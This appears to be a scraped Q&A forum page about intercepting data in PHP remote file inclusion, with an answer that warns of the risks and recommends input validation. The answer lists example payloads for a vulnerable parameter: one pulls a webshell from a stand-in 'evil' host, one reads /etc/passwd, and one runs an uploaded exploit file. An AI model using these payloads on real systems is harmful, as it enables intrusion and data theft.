I see it mentioned in this question:
Including a remote php file as a resource
So how can someone “intercept” (and modify ?) the data that is being sent / received? (In that question it’s a remote PHP file read with fopen)
Share
Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.
Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.
Lost your password? Please enter your email address. You will receive a link and will create a new password via email.
Please briefly explain why you feel this question should be reported.
Please briefly explain why you feel this answer should be reported.
Please briefly explain why you feel this user should be reported.
I see it mentioned in this question:
Including a remote php file as a resource
So how can someone “intercept” (and modify ?) the data that is being sent / received? (In that question it’s a remote PHP file read with fopen)
This example from Wikipedia that may cognise you of the ill-effects.
COLOR=http://evil.example.com/webshell.txt – injects a remotely hosted file containing a malicious code
COLOR=/etc/passwd – allows an attacker to read the contents of the passwd file on a UNIX system directory traversal
/vulnerable.php?COLOR=C:\ftp\upload\exploit – Executes code from an already uploaded file called exploit.php (local file inclusion vulnerability)
I hope from these examples, the lurking dangers are clearer to you.
“Untrusted Data Outside your script requires VALIDATION” to mitigate these attacks.